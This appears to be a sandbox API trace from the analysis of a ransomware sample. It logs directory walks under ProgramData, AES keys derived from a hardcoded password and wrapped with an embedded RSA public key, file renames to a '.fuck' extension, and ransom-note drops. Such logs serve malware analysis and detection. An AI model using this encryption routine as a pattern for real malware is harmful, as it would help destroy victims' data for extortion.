CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x286c9a0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x286c9a0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x286c9a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.921] CloseHandle (hObject=0xffffffff) returned 1 [0237.921] CloseHandle (hObject=0xffffffff) returned 1 [0237.922] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"), bFailIfExists=0) returned 0 [0237.922] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", dwFileAttributes=0x0) returned 0 [0237.922] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.gsg")) returned 0 [0237.922] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.fuck" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.fuck")) returned 0 [0237.923] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.923] CryptDestroyKey (hKey=0x28467e0) returned 1 [0237.923] CryptReleaseContext (hProv=0x2859ae0, dwFlags=0x0) returned 1 [0237.923] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.923] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.923] GetLastError () returned 0x5 [0237.923] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch")) returned 0x20 [0237.923] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", dwFileAttributes=0x80) returned 0 [0237.923] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.924] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.924] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg", dwFileAttributes=0x2) returned 0 [0237.924] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2859728) returned 1 [0237.929] CryptCreateHash (in: hProv=0x2859728, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.929] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.929] CryptHashData (hHash=0x2845ea0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.929] CryptDeriveKey (in: hProv=0x2859728, Algid=0x6610, hBaseData=0x2845ea0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28467e0) returned 1 [0237.929] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.929] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.929] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2859948) returned 1 [0237.930] CryptImportPublicKeyInfo (in: hCryptProv=0x2859948, dwCertEncodingType=0x1, pInfo=0x2869528*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869558*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869560*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846860) returned 1 [0237.930] CryptEncrypt (in: hKey=0x2846860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.930] CryptEncrypt (in: hKey=0x2846860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859ae0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2859ae0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859ae0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.930] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x285bd78, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.930] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285bd78*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x285bd78*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.930] CloseHandle (hObject=0xffffffff) returned 1 [0237.930] CloseHandle (hObject=0xffffffff) returned 1 [0237.930] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"), bFailIfExists=0) returned 0 [0237.931] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", dwFileAttributes=0x0) returned 0 [0237.931] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.gsg")) returned 0 [0237.931] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.fuck" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch.fuck")) returned 0 [0237.932] CryptDestroyHash (hHash=0x2845ea0) returned 1 [0237.932] CryptDestroyKey (hKey=0x28467e0) returned 1 [0237.932] CryptReleaseContext (hProv=0x2859728, dwFlags=0x0) returned 1 [0237.932] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.932] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.932] GetLastError () returned 0x5 [0237.932] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol")) returned 0x20 [0237.932] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol", dwFileAttributes=0x80) returned 0 [0237.933] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.933] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.934] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg", dwFileAttributes=0x2) returned 0 [0237.934] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2858160) returned 1 [0237.936] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.936] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.936] CryptHashData (hHash=0x28463e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.936] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846ba0) returned 1 [0237.936] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.936] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.937] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2859728) returned 1 [0237.937] CryptImportPublicKeyInfo (in: hCryptProv=0x2859728, dwCertEncodingType=0x1, pInfo=0x286a088*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a0b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a0c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846920) returned 1 [0237.937] CryptEncrypt (in: hKey=0x2846920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.937] CryptEncrypt (in: hKey=0x2846920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859b68*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2859b68*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.937] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859b68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.937] ReadFile (in: hFile=0xffffffff, lpBuffer=0x286c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x286c9a0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.937] CryptEncrypt (in: hKey=0x2846ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x286c9a0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x286c9a0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.937] WriteFile (in: hFile=0xffffffff, lpBuffer=0x286c9a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.938] CloseHandle (hObject=0xffffffff) returned 1 [0237.938] CloseHandle (hObject=0xffffffff) returned 1 [0237.938] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"), bFailIfExists=0) returned 0 [0237.938] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol", dwFileAttributes=0x0) returned 0 [0237.938] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.gsg")) returned 0 [0237.939] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol.fuck" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol.fuck")) returned 0 [0237.939] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.939] CryptDestroyKey (hKey=0x2846ba0) returned 1 [0237.939] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.939] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.939] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.939] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\readme_back_files.htm")) returned 0xffffffff [0237.939] AreFileApisANSI () returned 1 [0237.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x282e448, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0237.939] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.940] GetLastError () returned 0x5 [0237.940] GetLastError () returned 0x5 [0237.940] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.940] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0237.940] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\vault\\readme_back_files.htm")) returned 0xffffffff [0237.940] AreFileApisANSI () returned 1 [0237.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0237.940] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\vault\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.940] GetLastError () returned 0x5 [0237.940] GetLastError () returned 0x5 [0237.941] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.941] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\WDF\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28463e0 [0237.941] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.941] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.941] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.941] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\WDF\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wdf\\readme_back_files.htm")) returned 0xffffffff [0237.941] AreFileApisANSI () returned 1 [0237.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0237.941] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\WDF\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wdf\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.941] GetLastError () returned 0x5 [0237.941] GetLastError () returned 0x5 [0237.942] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.942] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.942] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.942] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.942] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.942] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\WinMSIPC\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845de0 [0237.943] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.943] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.943] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\WinMSIPC\\Server\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845ea0 [0237.943] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.943] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.943] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.943] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\WinMSIPC\\Server\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\winmsipc\\server\\readme_back_files.htm")) returned 0xffffffff [0237.943] AreFileApisANSI () returned 1 [0237.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0237.944] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\WinMSIPC\\Server\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\winmsipc\\server\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.944] GetLastError () returned 0x5 [0237.944] GetLastError () returned 0x5 [0237.944] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.944] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.945] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\WinMSIPC\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\winmsipc\\readme_back_files.htm")) returned 0xffffffff [0237.945] AreFileApisANSI () returned 1 [0237.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0237.945] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\WinMSIPC\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\winmsipc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.945] GetLastError () returned 0x5 [0237.945] GetLastError () returned 0x5 [0237.945] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.945] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845ea0 [0237.946] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.946] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.946] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28463e0 [0237.946] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.946] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.946] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.946] GetFileAttributesA 